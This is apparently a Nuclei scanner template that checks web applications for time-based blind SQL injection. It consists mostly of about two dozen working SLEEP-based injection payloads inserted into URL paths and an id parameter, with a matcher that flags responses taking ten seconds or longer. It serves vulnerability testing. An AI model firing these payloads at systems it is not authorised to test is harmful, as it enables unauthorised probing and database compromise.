id: time-based-sqli-uri-finder

info:
  name: Time-Based SQL Injection in URI
  description: Test for Time-Based SQL Injection in URI
  author: erickfernandox
  severity: critical
  tags: sqlinjection


requests:
  - method: GET
    path:
      - "{{BaseURL}}/dont-work-sqli"
      - "{{BaseURL}}/0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z"
      - "{{BaseURL}}/0%27XOR(if(now()=sysdate()%2Csleep(5*5)%2C0))XOR%27Z"      
      - "{{BaseURL}}'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z"  
      - "{{BaseURL}}%27XOR(if(now()=sysdate()%2Csleep(5*5)%2C0))XOR%27Z"        
      - "{{BaseURL}}/(SELECT(0)FROM(SELECT(SLEEP(10)))a)/"
      - "{{BaseURL}}'%20AND%20(SELECT 5735 FROM (SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp"
      - "{{BaseURL}}%27%20AND%20(SELECT+5735+FROM+(SELECT(SLEEP(5*5)))YpRn)%20AND%20%27Jswp%27=%27Jswp"      
      - "{{BaseURL}}/'%20AND%20(SELECT 5735 FROM (SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp"
      - "{{BaseURL}}?id=0'AND%20(SELECT%205735%20FROM%20(SELECT(SLEEP(10)))YpRn)%20AND%20'Jswp'='Jswp"      
      - "{{BaseURL}}/,(select+*+from+(select(sleep(10)))a)/"
      - "{{BaseURL}}/1)+or+sleep(10)#/"   
      - "{{BaseURL}})+or+sleep(10)#/"         
      - "{{BaseURL}}/1'+and+sleep(10)"   
      - "{{BaseURL}}/1%27+and+sleep(10)"         
      - "{{BaseURL}}/'sleep(10)%20--//"
      - "{{BaseURL}}'%20sleep(10)%20--//"         
      - "{{BaseURL}}/AND+SLEEP(10)--"     
      - "{{BaseURL}}/'+AND+SLEEP(10)+AND+'1"     
      - "{{BaseURL}}'+AND+SLEEP(10)+AND+'1"           
      - "{{BaseURL}}%27+AND+SLEEP(10)+AND+%271"                 
      - "{{BaseURL}}/+ORDER+BY+SLEEP(10)/"     
      - "{{BaseURL}}/AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))bAKL)+AND+'vRxe'='vRxe" 

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'duration>=10'
